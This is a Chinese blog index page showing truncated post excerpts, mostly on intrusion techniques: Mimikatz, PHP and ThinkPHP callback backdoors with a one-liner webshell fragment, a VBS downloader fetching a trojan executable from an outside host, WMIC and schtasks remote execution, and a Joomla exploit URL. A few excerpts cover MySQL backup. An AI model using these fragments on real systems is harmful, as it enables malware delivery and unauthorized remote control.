摘要:
Mimikatz是一款能够从Windows中获取内存,并且获取明文密码和NTLM哈希值的神器,本文将介绍如何防御这款软件获取密码。 Mimikatz介绍 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。他们 阅读全文
posted @ 2016-02-20 14:11
Hookjoy
阅读(2127)
评论(0)
推荐(0)
摘要:
JavaScript代码,能导致火狐、谷歌Safari浏览器崩溃,甚至让iPhone重启 阅读全文
posted @ 2016-01-20 17:48
Hookjoy
阅读(344)
评论(0)
推荐(0)
摘要:
原文连接:http://www.cnblogs.com/liongis/archive/2013/03/12/2956573.html基于之前的文章方法,加入批处理命令即可实现自动备份。只是由于批处理命令中对于备份文件的名字按照时间命名比较特别,所以特别整理一文。1、复制date文件夹备份=====... 阅读全文
posted @ 2015-11-30 01:59
Hookjoy
阅读(219)
评论(0)
推荐(0)
摘要:
设置方法:步一设A服务服(192.168.1.43)上用户为backup, 123456 ,同步的数据库为test;B服务服(192.168.1.23)上用户为root, 123456,同步的数据库为test;步二配置mysql.ini:A服务器#Replication masterserver-i... 阅读全文
posted @ 2015-11-30 01:53
Hookjoy
阅读(698)
评论(0)
推荐(0)
摘要:
作者:Phithon原文连接:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html最近很多人分享一些过狗过盾的一句话,但无非是用各种方法去构造一些动态函数,比如$_GET['func']($_REQUEST['pass']... 阅读全文
posted @ 2015-11-18 05:32
Hookjoy
阅读(1591)
评论(0)
推荐(0)
摘要:
原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。 thinkphp的I函数,是其处理输入的函数,... 阅读全文
posted @ 2015-11-18 05:32
Hookjoy
阅读(2111)
评论(0)
推荐(0)
摘要:
压缩一个文件:makecab c:\ls.exe ls.zip解压一个文件:expand c:\ls.zip c:\ls.exe 阅读全文
posted @ 2015-11-07 13:47
Hookjoy
阅读(8479)
评论(0)
推荐(1)
摘要:
一、VBS下载者:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://www.03389.com/muma.exe",0Post.Send(... 阅读全文
posted @ 2015-10-29 12:01
Hookjoy
阅读(752)
评论(0)
推荐(0)
摘要:
WMIC远程运行命令wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”schtasks计划任务远程运行schtasks /create /tn foobar /tr c:... 阅读全文
posted @ 2015-10-24 13:16
Hookjoy
阅读(429)
评论(0)
推荐(0)
摘要:
http://www.sebug.net/vuldb/ssvid-89680#0-tsina-1-18081-397232819ff9a47a7b7e80a40613cfe1http://10.211.55.3/joomla/index.php?option=com_contenthistory&v... 阅读全文
posted @ 2015-10-24 01:42
Hookjoy
阅读(421)
评论(0)
推荐(0)
浙公网安备 33010602011771号